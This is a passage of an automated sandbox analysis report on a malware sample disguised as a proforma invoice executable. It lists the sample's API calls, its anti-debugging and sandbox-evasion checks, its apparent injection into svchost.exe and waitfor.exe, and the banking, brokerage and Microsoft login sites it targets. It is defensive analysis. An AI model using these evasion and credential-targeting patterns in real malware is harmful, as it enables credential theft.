                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_002548D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_002548D7
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_002D5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_002D5376
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_00273187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00273187
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\waitfor.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe API/Special instruction interceptor: Address: C530EC
                Source: C:\Windows\SysWOW64\waitfor.exe API/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\waitfor.exe API/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\waitfor.exe API/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\waitfor.exe API/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\waitfor.exe API/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\waitfor.exe API/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\waitfor.exe API/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\waitfor.exe API/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0337096E rdtsc 2_2_0337096E
                Source: C:\Windows\SysWOW64\waitfor.exe Window / User API: threadDelayed 5118
                Source: C:\Windows\SysWOW64\waitfor.exe Window / User API: threadDelayed 4855
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-102101
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe API coverage: 4.4 %
                Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.8 %
                Source: C:\Windows\SysWOW64\waitfor.exe TID: 6128 Thread sleep count: 5118 > 30
                Source: C:\Windows\SysWOW64\waitfor.exe TID: 6128 Thread sleep time: -10236000s >= -30000s
                Source: C:\Windows\SysWOW64\waitfor.exe TID: 6128 Thread sleep count: 4855 > 30
                Source: C:\Windows\SysWOW64\waitfor.exe TID: 6128 Thread sleep time: -9710000s >= -30000s
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe TID: 7064 Thread sleep time: -70000s >= -30000s
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe TID: 7064 Thread sleep count: 36 > 30
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe TID: 7064 Thread sleep time: -54000s >= -30000s
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe TID: 7064 Thread sleep count: 36 > 30
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe TID: 7064 Thread sleep time: -36000s >= -30000s
                Source: C:\Windows\SysWOW64\waitfor.exe Last function: Thread delayed
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_002B445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_002B445A
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_002BC6D1 FindFirstFileW,FindClose,0_2_002BC6D1
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_002BC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_002BC75C
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_002BEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_002BEF95
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_002BF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_002BF0F2
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_002BF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_002BF3F3
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_002B37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_002B37EF
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_002B3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_002B3B12
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_002BBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_002BBCBC
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_002549A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_002549A0
                Source: FxK39HI69.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: FxK39HI69.5.dr Binary or memory string: discord.comVMware20,11696428655f
                Source: FxK39HI69.5.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: FxK39HI69.5.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: FxK39HI69.5.dr Binary or memory string: global block list test formVMware20,11696428655
                Source: FxK39HI69.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: FxK39HI69.5.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: FxK39HI69.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: FxK39HI69.5.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: FxK39HI69.5.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: FxK39HI69.5.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: FxK39HI69.5.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: FxK39HI69.5.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: FxK39HI69.5.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
                Source: FxK39HI69.5.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: firefox.exe, 00000008.00000002.2597482429.000001FBFA7DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
                Source: waitfor.exe, 00000005.00000002.4468568240.0000000000A46000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: FxK39HI69.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: FxK39HI69.5.dr Binary or memory string: outlook.office.comVMware20,11696428655s
                Source: FxK39HI69.5.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: FxK39HI69.5.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: FxK39HI69.5.dr Binary or memory string: AMC password management pageVMware20,11696428655
                Source: FxK39HI69.5.dr Binary or memory string: tasks.office.comVMware20,11696428655o
                Source: FxK39HI69.5.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: nfGtWoQBhJSQ.exe, 00000006.00000002.4469046244.00000000006BF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
                Source: FxK39HI69.5.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: FxK39HI69.5.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
                Source: FxK39HI69.5.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: FxK39HI69.5.dr Binary or memory string: dev.azure.comVMware20,11696428655j
                Source: FxK39HI69.5.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: FxK39HI69.5.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: FxK39HI69.5.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
                Source: FxK39HI69.5.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: FxK39HI69.5.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\waitfor.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0337096E rdtsc 2_2_0337096E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00418073 LdrLoadDll,2_2_00418073
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_002C3F09 BlockInput,0_2_002C3F09
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_00253B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00253B3A
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_00285A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00285A7C
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_00254B37 LoadLibraryA,GetProcAddress,0_2_00254B37
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_00C533B8 mov eax, dword ptr fs:[00000030h] 0_2_00C533B8
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_00C53358 mov eax, dword ptr fs:[00000030h] 0_2_00C53358
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_00C51D38 mov eax, dword ptr fs:[00000030h] 0_2_00C51D38
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0332C310 mov ecx, dword ptr fs:[00000030h] 2_2_0332C310
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03350310 mov ecx, dword ptr fs:[00000030h] 2_2_03350310
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h] 2_2_0336A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033D437C mov eax, dword ptr fs:[00000030h] 2_2_033D437C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033B035C mov eax, dword ptr fs:[00000030h] 2_2_033B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033B035C mov ecx, dword ptr fs:[00000030h] 2_2_033B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033FA352 mov eax, dword ptr fs:[00000030h] 2_2_033FA352
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033D8350 mov ecx, dword ptr fs:[00000030h] 2_2_033D8350
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h] 2_2_033B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03328397 mov eax, dword ptr fs:[00000030h] 2_2_03328397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h] 2_2_0332E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0335438F mov eax, dword ptr fs:[00000030h] 2_2_0335438F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0334E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033663FF mov eax, dword ptr fs:[00000030h] 2_2_033663FF
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h] 2_2_033403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033DE3DB mov eax, dword ptr fs:[00000030h] 2_2_033DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033DE3DB mov ecx, dword ptr fs:[00000030h] 2_2_033DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033D43D4 mov eax, dword ptr fs:[00000030h] 2_2_033D43D4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033EC3CD mov eax, dword ptr fs:[00000030h] 2_2_033EC3CD
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0333A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h] 2_2_033383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033B63C0 mov eax, dword ptr fs:[00000030h] 2_2_033B63C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0332823B mov eax, dword ptr fs:[00000030h] 2_2_0332823B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h] 2_2_033E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03334260 mov eax, dword ptr fs:[00000030h] 2_2_03334260
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0332826B mov eax, dword ptr fs:[00000030h] 2_2_0332826B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0332A250 mov eax, dword ptr fs:[00000030h] 2_2_0332A250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03336259 mov eax, dword ptr fs:[00000030h] 2_2_03336259
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033EA250 mov eax, dword ptr fs:[00000030h] 2_2_033EA250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033B8243 mov eax, dword ptr fs:[00000030h] 2_2_033B8243
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033B8243 mov ecx, dword ptr fs:[00000030h] 2_2_033B8243
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033402A0 mov eax, dword ptr fs:[00000030h] 2_2_033402A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h] 2_2_033C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033C62A0 mov ecx, dword ptr fs:[00000030h] 2_2_033C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0336E284 mov eax, dword ptr fs:[00000030h] 2_2_0336E284
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h] 2_2_033B0283
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h] 2_2_033402E1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0333A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03360124 mov eax, dword ptr fs:[00000030h] 2_2_03360124
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033DA118 mov ecx, dword ptr fs:[00000030h] 2_2_033DA118
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h] 2_2_033DA118
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033F0115 mov eax, dword ptr fs:[00000030h] 2_2_033F0115
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h] 2_2_033DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h] 2_2_033DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0332C156 mov eax, dword ptr fs:[00000030h] 2_2_0332C156
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033C8158 mov eax, dword ptr fs:[00000030h] 2_2_033C8158
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03336154 mov eax, dword ptr fs:[00000030h] 2_2_03336154
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h] 2_2_033C4144
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033C4144 mov ecx, dword ptr fs:[00000030h] 2_2_033C4144
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033B019F mov eax, dword ptr fs:[00000030h] 2_2_033B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]2_2_0332A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]2_2_0332A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]2_2_0332A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034061E5 mov eax, dword ptr fs:[00000030h]2_2_034061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03370185 mov eax, dword ptr fs:[00000030h]2_2_03370185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EC188 mov eax, dword ptr fs:[00000030h]2_2_033EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EC188 mov eax, dword ptr fs:[00000030h]2_2_033EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D4180 mov eax, dword ptr fs:[00000030h]2_2_033D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D4180 mov eax, dword ptr fs:[00000030h]2_2_033D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033601F8 mov eax, dword ptr fs:[00000030h]2_2_033601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_033AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F61C3 mov eax, dword ptr fs:[00000030h]2_2_033F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F61C3 mov eax, dword ptr fs:[00000030h]2_2_033F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C6030 mov eax, dword ptr fs:[00000030h]2_2_033C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A020 mov eax, dword ptr fs:[00000030h]2_2_0332A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C020 mov eax, dword ptr fs:[00000030h]2_2_0332C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B4000 mov ecx, dword ptr fs:[00000030h]2_2_033B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335C073 mov eax, dword ptr fs:[00000030h]2_2_0335C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03332050 mov eax, dword ptr fs:[00000030h]2_2_03332050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6050 mov eax, dword ptr fs:[00000030h]2_2_033B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F60B8 mov eax, dword ptr fs:[00000030h]2_2_033F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F60B8 mov ecx, dword ptr fs:[00000030h]2_2_033F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C80A8 mov eax, dword ptr fs:[00000030h]2_2_033C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333208A mov eax, dword ptr fs:[00000030h]2_2_0333208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C0F0 mov eax, dword ptr fs:[00000030h]2_2_0332C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033720F0 mov ecx, dword ptr fs:[00000030h]2_2_033720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0332A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033380E9 mov eax, dword ptr fs:[00000030h]2_2_033380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B60E0 mov eax, dword ptr fs:[00000030h]2_2_033B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B20DE mov eax, dword ptr fs:[00000030h]2_2_033B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336273C mov eax, dword ptr fs:[00000030h]2_2_0336273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336273C mov ecx, dword ptr fs:[00000030h]2_2_0336273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336273C mov eax, dword ptr fs:[00000030h]2_2_0336273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AC730 mov eax, dword ptr fs:[00000030h]2_2_033AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C720 mov eax, dword ptr fs:[00000030h]2_2_0336C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C720 mov eax, dword ptr fs:[00000030h]2_2_0336C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330710 mov eax, dword ptr fs:[00000030h]2_2_03330710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03360710 mov eax, dword ptr fs:[00000030h]2_2_03360710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C700 mov eax, dword ptr fs:[00000030h]2_2_0336C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338770 mov eax, dword ptr fs:[00000030h]2_2_03338770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330750 mov eax, dword ptr fs:[00000030h]2_2_03330750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BE75D mov eax, dword ptr fs:[00000030h]2_2_033BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372750 mov eax, dword ptr fs:[00000030h]2_2_03372750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372750 mov eax, dword ptr fs:[00000030h]2_2_03372750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B4755 mov eax, dword ptr fs:[00000030h]2_2_033B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336674D mov esi, dword ptr fs:[00000030h]2_2_0336674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336674D mov eax, dword ptr fs:[00000030h]2_2_0336674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336674D mov eax, dword ptr fs:[00000030h]2_2_0336674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033307AF mov eax, dword ptr fs:[00000030h]2_2_033307AF
